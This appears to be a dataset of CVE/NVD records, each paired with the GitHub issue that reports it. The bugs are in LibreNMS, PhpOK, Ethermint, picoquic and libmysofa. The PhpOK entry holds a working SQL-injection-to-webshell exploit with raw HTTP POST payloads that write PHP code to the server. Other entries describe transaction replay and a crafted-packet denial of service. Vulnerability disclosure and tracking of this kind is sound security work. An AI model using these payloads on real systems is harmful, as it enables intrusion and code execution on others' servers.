"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/librenms/librenms/blob/master/app/Http/Controllers/Widgets/TopDevicesController.php"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/librenms/librenms/issues/12405"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/librenms/librenms/pull/12422"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/librenms/librenms/releases/tag/21.1.0"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.horizon3.ai/disclosures/librenms-second-order-sqli"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/librenms/librenms/blob/master/app/Http/Controllers/Widgets/TopDevicesController.php"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/librenms/librenms/issues/12405"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/librenms/librenms/pull/12422"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/librenms/librenms/releases/tag/21.1.0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.horizon3.ai/disclosures/librenms-second-order-sqli"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5FF7D7E0-76F6-43EE-B8D7-C22D68D9FD4A",
"versionEndExcluding": "21.1.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/librenms/librenms/issues/12405 | [
"Third Party Advisory"
] | github.com | [
"librenms",
"librenms"
] | Hi, can I please get a point of contact to report a security issue? The email address team@librenms.org is bouncing. Thanks! | security issue | https://api.github.com/repos/librenms/librenms/issues/12405/comments | 0 | 2020-12-22T14:03:39Z | 2021-01-07T11:44:28Z | https://github.com/librenms/librenms/issues/12405 | 772,970,476 | 12,405 | 1,683 |
CVE-2020-16629 | 2021-02-08T15:15:12.037 | PhpOK 5.4.137 contains a SQL injection vulnerability that can inject an attachment data through SQL, and then call the attachment replacement function through api.php to write a PHP file to the target path. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Gh0stF/phpok_cve/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Gh0stF/phpok_cve/issues/1"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:phpok:phpok:5.4.137:*:*:*:*:*:*:*",
"matchCriteriaId": "E367CCE4-12E3-47DC-B5A8-EDBB52E489F3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/Gh0stF/phpok_cve/issues/1 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"Gh0stF",
"phpok_cve"
] | Problem location:
Here is the injection point framework / API / upload_control.php:67. The main operation is to save the file upload information to the database.
$upload = $this->lib('upload')->upload('upfile');
if (!$upload || !$upload['status']) {
$this - > JSON (p_lang ('attachment upload failed ');
}
if ($upload['status'] != 'ok') {
$this->json($upload['content']);
}
$array = array();
$array["cate_id"] = $this->lib('upload')->get_cate();
$array["folder"] = $this->lib('upload')->get_folder();
$array["name"] = $upload['name'];
$array["ext"] = $upload["ext"];
$array["filename"] = $upload['filename'];
$array["addtime"] = $this->time;
$array['title'] = $upload['title'];
$array["mime_type"] = $upload['mime_type'];
$arraylist = array("jpg", "gif", "png", "jpeg");
if (in_array($upload['ext'], $arraylist)) {
$img_ext = getimagesize($this->dir_root . $upload['filename']);
$my_ext = array("width" => $img_ext[0], "height" => $img_ext[1]);
$array["attr"] = serialize($my_ext);
}
if (!$this->is_client) {
$array["session_id"] = $this->session->sessid();
}
$array['user_id'] = $this->u_id;
$id = $this->model('res')->save($array);
We followed $upload = $this - > lib ('upload ') - > upload ('upfile');
Enter the actual method in framework / LIBS / upload.php: 204
We see two lines of key code
$mime_type = $_FILES[$input]["type"];
...
return array('title' => $title, 'ext' => $ext, 'mime_type' => $mime_type, 'filename' => $outfile, 'folder' => $this->folder, 'status' => 'ok');
The returned mime_type is obtained, and the $mime_type is not filtered and checked in the middle, and the $_filesvariable is not reviewed, which may result in injection.
Verification and exp:
The corresponding interface of the upload method is /api.php?c=upload&f=save
The upload call page is /index.php?c=usercp&f=avatar
Let's put the breakpoint in framework/engine/db/mysqli.php:111, then upload the avatar, intercept it, and put a single quotation mark on the content type


You can see this Sql information:
INSERT INTO qinggan_res (`cate_id`,`folder`,`name`,`ext`,`filename`,`addtime`,`title`,`mime_type`,`attr`,`session_id`,`user_id`) VALUES('1','res/202001/19/','','png','res/202001/19/2309a96e89ea3880.png','1579430399','loading','image/png'','a:2:{s:5:"width";i:1422;s:6:"height";i:1066;}','b35ptcavpkib4juss1451hbu4u','45')
Then the injection point has appeared, using method: PhpOK can call the controller and its methods through api.php, and there is an attachment replacement method at framework/www/upload_control.php:104, which queries the old file name from the database, then deletes the corresponding file to the disk, and adds the newly uploaded file. We can see the key method of attachment replacement It is located in framework / LIBS / file.php: 269, as follows:
public function mv($old,$new,$recover=true)
{
if(!file_exists($old)){
return false;
}
if(substr($new,-1) == "/"){
$this->make($new,"dir");
}else{
$this->make($new,"file");
}
if(file_exists($new)){
if($recover){
unlink($new);
}else{
return false;
}
}else{
$new = $new.basename($old);
}
rename($old,$new);
return true;
}
As you can see, although it's an attachment replacement, it doesn't matter if the source attachment doesn't exist. It's still written normally.
So the idea from injection to getshell is: inject an attachment data through SQL, the file type is PHP, and then call the attachment replacement function through api.php, you can write a PHP file to the target path.
Then payload is as follows
POST /api.php?c=upload&f=save HTTP/1.1
Host: local.hundan.org
Content-Length: 902
Origin: http://local.hundan.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.53 Safari/537.36 Edg/80.0.361.33
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2Eig5P1Ubm1e2y05
Accept: */*
Referer: http://local.hundan.org/index.php?c=usercp&f=avatar
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
------WebKitFormBoundary2Eig5P1Ubm1e2y05
Content-Disposition: form-data; name="id"
WU_FILE_0
------WebKitFormBoundary2Eig5P1Ubm1e2y05
Content-Disposition: form-data; name="name"
loading.png
------WebKitFormBoundary2Eig5P1Ubm1e2y05
Content-Disposition: form-data; name="type"


However , In the upload part, there are two bytes of file header detection

So we need to add two bytes of picture header, URL encoded as %89p
So payload is like this
POST /index.php?c=upload&f=replace&oldid=1435 HTTP/1.1
Host: local.hundan.org
Content-Length: 763
Origin: http://local.hundan.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.53 Safari/537.36 Edg/80.0.361.33
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2Eig5P1Ubm1e2y05
Accept: */*
Referer: http://local.hundan.org/index.php?c=usercp&f=avatar
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
------WebKitFormBoundary2Eig5P1Ubm1e2y05
Content-Disposition: form-data; name="id"
WU_FILE_0
------WebKitFormBoundary2Eig5P1Ubm1e2y05
Content-Disposition: form-data; name="name"
loading.png
------WebKitFormBoundary2Eig5P1Ubm1e2y05
Content-Disposition: form-data; name="type"
image/png
------WebKitFormBoundary2Eig5P1Ubm1e2y05
Content-Disposition: form-data; name="lastModifiedDate"
Wed Sep 18 2019 19:38:52 GMT+0800 (China Standard Time)
------WebKitFormBoundary2Eig5P1Ubm1e2y05
Content-Disposition: form-data; name="size"
153699
------WebKitFormBoundary2Eig5P1Ubm1e2y05
Content-Disposition: form-data; name="upfile"; filename="loading.png"
Content-Type: image/png
P
<?php phpinfo();?>
------WebKitFormBoundary2Eig5P1Ubm1e2y05--

Boom! We can see the phpinfo() is really successfully output on page !

| phpokcms Sqli To Getshell | https://api.github.com/repos/Gh0stF/phpok_cve/issues/1/comments | 0 | 2020-02-06T05:33:40Z | 2020-02-06T05:33:40Z | https://github.com/Gh0stF/phpok_cve/issues/1 | 560,789,961 | 1 | 1,684 |
CVE-2021-25834 | 2021-02-08T18:15:13.740 | Cosmos Network Ethermint <= v0.4.0 is affected by a transaction replay vulnerability in the EVM module. If the victim sends a very large nonce transaction, the attacker can replay the transaction through the application. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/cosmos/ethermint/issues/686"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/cosmos/ethermint/issues/686"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:chainsafe:ethermint:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A35C91FB-4A33-4A25-8406-5F9143CF0828",
"versionEndExcluding": null,
"versionEndIncluding": "0.4.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"294"
] | 294 | https://github.com/cosmos/ethermint/issues/686 | [
"Third Party Advisory"
] | github.com | [
"cosmos",
"ethermint"
] | ## Vulnerability Overview:
Since there is no explicit +1 limit on the nonce check used by ethermint, this results in transactions passing the antehandler checksum as long as they are greater than the node’s cached nonce. If the victim sends a very large nonce transaction, the attacker can replay the transaction.
## Details and Root Cause:
First, we found some ground truths:
As long as the MsgEthereumTx is larger than the current node’s cache nonce, it will pass both noncecheck.
Signaturecheck uses the nonce field of the transaction itself, so transactions larger than the current cached nonce can still pass signaturecheck.
Thus, if a msg have a large nonce,then it can be replaied.
## Steps to Exploit:
Suppose the victim sends a nonce that is much larger than the current node’s cache.
An attacker can replay this transaction.
| Weak noncecheck lead to replay of transactions | https://api.github.com/repos/cosmos/ethermint/issues/686/comments | 2 | 2021-01-06T02:39:29Z | 2021-02-22T05:39:56Z | https://github.com/cosmos/ethermint/issues/686 | 779,904,555 | 686 | 1,685 |
CVE-2021-25835 | 2021-02-08T18:15:13.803 | Cosmos Network Ethermint <= v0.4.0 is affected by a cross-chain transaction replay vulnerability in the EVM module. Since ethermint uses the same chainIDEpoch and signature schemes with ethereum for compatibility, a verified signature in ethereum is still valid in ethermint with the same msg content and chainIDEpoch, which enables "cross-chain transaction replay" attack. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/cosmos/ethermint/issues/687"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cosmos/ethermint/pull/692"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/cosmos/ethermint/issues/687"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cosmos/ethermint/pull/692"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:chainsafe:ethermint:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A35C91FB-4A33-4A25-8406-5F9143CF0828",
"versionEndExcluding": null,
"versionEndIncluding": "0.4.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"294"
] | 294 | https://github.com/cosmos/ethermint/issues/687 | [
"Third Party Advisory"
] | github.com | [
"cosmos",
"ethermint"
] | ## Vulnerability Overview:
Since ethermint uses the same type of chainIDEpoch for ethereum compatibility, a verified signature in ethereum is still valid in ethermint with the same msg content and chainIDEpoch, which enables "cross-chain transaction replay" attack etc.
## Details and Root Cause:
First, we found some ground truths:
1. Both ethermint and ethereum have the same signature scheme.
2. User has the same public key and private key on ethermint and ethereum.
3. Different chainID can be parsed to a same chainIDEpoch such as "ethereum-1" and "erhermint-1"
Thus, if a msg successfully executed on ethereum of some chainIDEpoch, say 1 (mainnet), then it can be replaied on ethermint of the same chainIDEpoch (with the nonce check passed), and vice versa.
## Steps to Exploit:
1. Suppose that there are two chains. One's chainID is "Ethereum-1",the other is "Ethermint-1".The victim have accounts on both chains with the same public key (private key).
2. The victim transfer 10eth to the attacker,and the victim's MsgEthereumTx.data.nonce on "Ethereum-1" is 300. The victim's MsgEthereumTx.data.nonce on "Ethermint-1" is 300(or less than 300).For the previously mentioned vulnerability can greatly reduce the difficulty of exploiting this vulnerability only need to meet the nonce of the replayed chain than the nonce of the replayed chain can be low.
4. The attacker replay the MsgEthereumTx on "Ethermint-1". | Replay Tx on another Chain | https://api.github.com/repos/cosmos/ethermint/issues/687/comments | 2 | 2021-01-06T03:01:00Z | 2021-04-17T00:03:01Z | https://github.com/cosmos/ethermint/issues/687 | 779,923,860 | 687 | 1,686 |
CVE-2020-24944 | 2021-02-08T21:15:13.007 | picoquic (before 3rd of July 2020) allows attackers to cause a denial of service (infinite loop) via a crafted QUIC frame, related to the picoquic_decode_frames and picoquic_decode_stream_frame functions and epoch==3. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/private-octopus/picoquic/issues/969"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/private-octopus/picoquic/issues/969"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:privateoctopus:picoquic:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D5AC7576-D03B-4558-A45C-5E31F89C4849",
"versionEndExcluding": "2020-07-03",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"835"
] | 835 | https://github.com/private-octopus/picoquic/issues/969 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"private-octopus",
"picoquic"
] | In picoquic QUIC server maliciously crafted QUIC frame triggers infinite loop while processing.
Incorrect logical conditions in picoquic_decode_frames() and picoquic_decode_stream_frame() leads to infinite loop after processing single packet in epoch==3.
Attack can be performed remotely without any user interaction and authentication.
Proposed CVSS 3.0 score: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (7.5 - High)
(picoquic can be used in embedded environments where infinite loop in one module affects whole system, because there is not pre-emptive OS used)
Packet that triggers this issue (attached zipped): hang_001_decode_stream_frame.raw
To reproduce this issue in full server protocol session needs to be in state epoch==3.
Vulnerable loop is located in function picoquic_decode_frames() in picoquic/frames.c lines: 3630-3776.
Log of the loop with displayed parameters and variables:
picoquic/frames.c:3643 picoquic_decode_frames() : bytes: 0x20d2242 bytes_maxsize: 21
picoquic/frames.c:3630 picoquic_decode_frames() : bytes: 0x20d2242 bytes_maxsize: 21
picoquic/frames.c:902 picoquic_decode_stream_frame() : bytes 0x20d2242 bytes_max 255
picoquic/frames.c:918 picoquic_decode_stream_frame() : bytes 0x20d2242 | bytes_max 255 | stream_id 4611684923227504639 | offset 4611686018427387903 | data_length 2 | fin 1 | consumed 17
picoquic/frames.c:3643 picoquic_decode_frames() : bytes: 0x20d2242 bytes_maxsize: 21
picoquic/frames.c:3630 picoquic_decode_frames() : bytes: 0x20d2242 bytes_maxsize: 21
picoquic/frames.c:902 picoquic_decode_stream_frame() : bytes 0x20d2242 bytes_max 255
picoquic/frames.c:918 picoquic_decode_stream_frame() : bytes 0x20d2242 | bytes_max 255 | stream_id 4611684923227504639 | offset 4611686018427387903 | data_length 2 | fin 1 | consumed 17
...
Backtrace from gdb:
0x000000000041fb44 in picoquic_varint_decode (bytes=0x677251 "\377\377\377\377\377", bytes@entry=0x67724b '\377' <repeats 11 times>, max_bytes=max_bytes@entry=10, n64=0x7fffffffd468)
at picoquic/picoquic/intformat.c:148
148 v += *bytes++;
(gdb) bt
#0 0x000000000041fb44 in picoquic_varint_decode (bytes=0x677251 "\377\377\377\377\377", bytes@entry=0x67724b '\377' <repeats 11 times>, max_bytes=max_bytes@entry=10,
n64=0x7fffffffd468) at picoquic/picoquic/intformat.c:148
#1 0x0000000000419b49 in picoquic_parse_stream_header (bytes=bytes@entry=0x677242 "\r\377\377\377\001", bytes_max=bytes_max@entry=19, stream_id=stream_id@entry=0x7fffffffd458,
offset=offset@entry=0x7fffffffd468, data_length=data_length@entry=0x7fffffffd460, fin=fin@entry=0x7fffffffd450, consumed=0x7fffffffd470)
at picoquic/picoquic/frames.c:645
#2 0x000000000041c3f1 in picoquic_decode_stream_frame (cnx=cnx@entry=0x694420, bytes=0x677242 "\r\377\377\377\001", bytes_max=bytes_max@entry=0x677255 "\377",
current_time=current_time@entry=0) at picoquic/picoquic/frames.c:909
#3 0x000000000041f731 in picoquic_decode_frames (cnx=cnx@entry=0x694420, path_x=0x694f30, bytes=<optimized out>, bytes@entry=0x677240 "\001", bytes_maxsize=bytes_maxsize@entry=21,
epoch=epoch@entry=3, addr_from=addr_from@entry=0x0, addr_to=0x0, current_time=0) at picoquic/picoquic/frames.c:3641
#4 0x0000000000415f67 in parse_frame_test (buffer=0x677240 "\001", byte_max=22) at picoquic/picoquicfirst/picoquicdemo.c:1100
#5 0x0000000000411fce in main (argc=<optimized out>, argv=<optimized out>) at picoquic/picoquicfirst/picoquicdemo.c:1261
(gdb) bt full
#0 0x000000000041fb44 in picoquic_varint_decode (bytes=0x677251 "\377\377\377\377\377", bytes@entry=0x67724b '\377' <repeats 11 times>, max_bytes=max_bytes@entry=10,
n64=0x7fffffffd468) at picoquic/picoquic/intformat.c:148
i = 6
v = 70368744177663
length = 8
#1 0x0000000000419b49 in picoquic_parse_stream_header (bytes=bytes@entry=0x677242 "\r\377\377\377\001", bytes_max=bytes_max@entry=19, stream_id=stream_id@entry=0x7fffffffd458,
offset=offset@entry=0x7fffffffd468, data_length=data_length@entry=0x7fffffffd460, fin=fin@entry=0x7fffffffd450, consumed=0x7fffffffd470)
at picoquic/picoquic/frames.c:645
ret = 0
len = <optimized out>
off = 4
length = 0
l_stream = 8
l_len = 0
l_off = 0
byte_index = 9
__FUNCTION__ = "picoquic_parse_stream_header"
#2 0x000000000041c3f1 in picoquic_decode_stream_frame (cnx=cnx@entry=0x694420, bytes=0x677242 "\r\377\377\377\001", bytes_max=bytes_max@entry=0x677255 "\377",
current_time=current_time@entry=0) at picoquic/picoquic/frames.c:909
stream_id = 4611684923227504639
data_length = 2
offset = 4611686018427387903
fin = 1
consumed = 17
#3 0x000000000041f731 in picoquic_decode_frames (cnx=cnx@entry=0x694420, path_x=0x694f30, bytes=<optimized out>, bytes@entry=0x677240 "\001", bytes_maxsize=bytes_maxsize@entry=21,
epoch=epoch@entry=3, addr_from=addr_from@entry=0x0, addr_to=0x0, current_time=0) at picoquic/picoquic/frames.c:3641
first_byte = <optimized out>
bytes_max = 0x677255 "\377"
ack_needed = <optimized out>
pc = picoquic_packet_context_application
packet_data = {acked_path = 0x0, last_ack_delay = 0, last_time_stamp_received = 0, largest_sent_time = 0, delivered_prior = 0, delivered_time_prior = 0,
delivered_sent_prior = 0, rs_is_path_limited = 0}
__FUNCTION__ = "picoquic_decode_frames"
#4 0x0000000000415f67 in parse_frame_test (buffer=0x677240 "\001", byte_max=22) at picoquic/picoquicfirst/picoquicdemo.c:1100
epoch = 3
ret = 0
simulated_time = 0
saddr = {sin_family = 0, sin_port = 0, sin_addr = {s_addr = 0}, sin_zero = "\000\000\000\000\000\000\000"}
qclient = 0x677670
__FUNCTION__ = "parse_frame_test"
t_ret = 0
cnx = 0x694420
#5 0x0000000000411fce in main (argc=<optimized out>, argv=<optimized out>) at picoquic/picoquicfirst/picoquicdemo.c:1261
result = 0
Source code snippet to reproduce issue (rest of parameters are based on parse_frame_test() from picoquictest/skip_frame_test.c):
picoquic_decode_frames(cnx, cnx->path[0], buffer, byte_max, 3, NULL, NULL, simulated_time);
[hang_001_decode_stream_frame.raw.zip](https://github.com/private-octopus/picoquic/files/4865536/hang_001_decode_stream_frame.raw.zip) | Denial of Service vulnerability (infinite loop) while parsing malicious QUIC frame | https://api.github.com/repos/private-octopus/picoquic/issues/969/comments | 2 | 2020-07-02T16:25:16Z | 2020-07-03T01:33:27Z | https://github.com/private-octopus/picoquic/issues/969 | 650,060,583 | 969 | 1,687 |
CVE-2020-36148 | 2021-02-08T21:15:13.070 | Incorrect handling of input data in verifyAttribute function in the libmysofa library 0.5 - 1.1 will lead to NULL pointer dereference and segmentation fault error in case of restrictive memory protection or near NULL pointer overwrite in case of no memory restrictions (e.g. in embedded environments). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/hoene/libmysofa/issues/138"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RQLNZOVVONQSZZJHQVZT6NMOUUDMGBBR/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/hoene/libmysofa/issues/138"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RQLNZOVVONQSZZJHQVZT6NMOUUDMGBBR/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:symonics:libmysofa:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1A54F39D-2695-46A2-98DF-7FCDF56A3EC2",
"versionEndExcluding": null,
"versionEndIncluding": "1.1",
"versionStartExcluding": null,
"versionStartIncluding": "0.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*",
"matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
